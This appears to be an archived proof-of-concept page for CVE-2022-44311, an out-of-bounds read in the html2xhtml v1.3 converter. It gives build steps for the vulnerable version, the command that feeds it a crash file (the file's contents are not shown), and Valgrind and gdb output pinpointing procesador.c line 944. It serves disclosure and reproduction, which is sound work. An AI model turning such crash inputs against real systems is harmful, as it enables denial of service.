Associated Vulnerability
Title:Html2xhtml 缓冲区错误漏洞 (CVE-2022-44311)Description:Html2xhtml是Jesus Arias Fisteus个人开发者的一个将 HTML 文件转换为 XHTML 文件的命令行工具。 Html2xhtml v1.3版本存在缓冲区错误漏洞,该漏洞源于在 procesador.c 的函数 static void elm_close(tree_node_t *nodo) 中包含越界读取,攻击者利用该漏洞通可以通过精心制作的 html 文件访问敏感文件或导致拒绝服务 (DoS)。
Description
Proof of concept for CVE-2022-44311
Readme
# Description for CVE-2022-44311
html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file.
# Reproduction
To reproduce the vulnerability, download a vulnerable version of html2xhtml (v1.3) and compile the project:
```
wget http://www.it.uc3m.es/jaf/html2xhtml/downloads/html2xhtml-1.3.tar.gz
tar -xzvf html2xhtml-1.3.tar.gz
cd html2xhtml-1.3
./configure
make
cd src
```
Once the project has been compiled, we can point html2xhtml towards our proof of concept file included in this repository (CVE-2022-44311_crash):
```
./html2xhtml -t frameset ./CVE-2022-44311_crash
```
The previous command will produce a crash and return an error message:
```
zsh: segmentation fault ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
```
Attaching valgrind to the program can help us understand what is causing the crash:
```
└─$ valgrind ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753== Memcheck, a memory error detector
==267753== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==267753== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info
==267753== Command: ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753==
==267753== Invalid read of size 4
==267753== at 0x11B18A: elm_close (procesador.c:944)
==267753== by 0x11B18A: err_html_struct (procesador.c:1889)
==267753== by 0x11BBB5: err_content_invalid (procesador.c:1291)
==267753== by 0x11BBB5: elm_close.part.0 (procesador.c:959)
==267753== by 0x11C4C0: elm_close (procesador.c:944)
==267753== by 0x11C4C0: saxEndDocument (procesador.c:233)
==267753== by 0x1144AE: main (html2xhtml.c:117)
==267753== Address 0x3ec404 is not stack'd, malloc'd or (recently) free'd
==267753==
```
Valgrind tells us that an out-of-bounds read of size 4 is taking place in procesador.c, line 944. Attaching gdb to our program and executing the malicious file can confirm the valgrind output:
```
$ gdb src/html2xhtml
pwndbg> r -t frameset ./CVE-2022-44311_crash
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────────────────────
RAX 0xb11ae
RBX 0x5555555dd344 ◂— 0x3
RCX 0x5a
RDX 0x2
RDI 0x555555573d40 (elm_list) ◂— 0x6c6d7468 /* 'html' */
RSI 0x555555573160 (elm_buffer) ◂— 0xd9810100028b8101
R8 0x1
R9 0x5555555ee520 ◂— 0x5555555ee
R10 0x0
R11 0x7ffff7df2800 (iconv_close) ◂— cmp rdi, -1
R12 0x5555555dd2d6 ◂— 0x0
R13 0x7ffffffedc70 ◂— 0x600000001
R14 0x5555555dd2d6 ◂— 0x0
R15 0x4
RBP 0x555555573d40 (elm_list) ◂— 0x6c6d7468 /* 'html' */
RSP 0x7ffffffedc30 ◂— 0x1
RIP 0x55555556718a (err_html_struct+474) ◂— cmp dword ptr [rbp + rax*4 + 0xc], 4
─────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────────────────
► 0x55555556718a <err_html_struct+474> cmp dword ptr [rbp + rax*4 + 0xc], 4
0x55555556718f <err_html_struct+479> jne err_html_struct+489 <err_html_struct+489>
↓
0x555555567199 <err_html_struct+489> mov rbx, qword ptr [rbx + 8]
0x55555556719d <err_html_struct+493> test rbx, rbx
0x5555555671a0 <err_html_struct+496> jne err_html_struct+448 <err_html_struct+448>
↓
0x555555567170 <err_html_struct+448> cmp r12, rbx
0x555555567173 <err_html_struct+451> je err_html_struct+498 <err_html_struct+498>
↓
0x5555555671a2 <err_html_struct+498> xor edi, edi
0x5555555671a4 <err_html_struct+500> mov qword ptr [rip + 0x4d6d5], r12 <actual_element>
0x5555555671ab <err_html_struct+507> call new_tree_node <new_tree_node>
0x5555555671b0 <err_html_struct+512> mov dword ptr [rax + 0x18], 0x59
──────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────────────────────────────────────────────────────────
In file: /dev/shm/html2xhtml-1.3/src/procesador.c
939 static void elm_close(tree_node_t *nodo)
940 {
941 DEBUG("elm_close()");
942 EPRINTF1("cerrando elemento %s\n",ELM_PTR(nodo).name);
943
► 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
949
```
GDB confirmed that the program is attempting to read from an invalid memory address when executing the following lines of source code:
```
► 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
```
# References
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44311
* https://cwe.mitre.org/data/definitions/125.html
File Snapshot
[4.0K] /data/pocs/6847a793f6571fa50617dba4f2c4c45e201718ab
├── [8.0K] CVE-2022-44311_crash
├── [544K] html2xhtml-1.3.tar.gz
└── [8.3K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.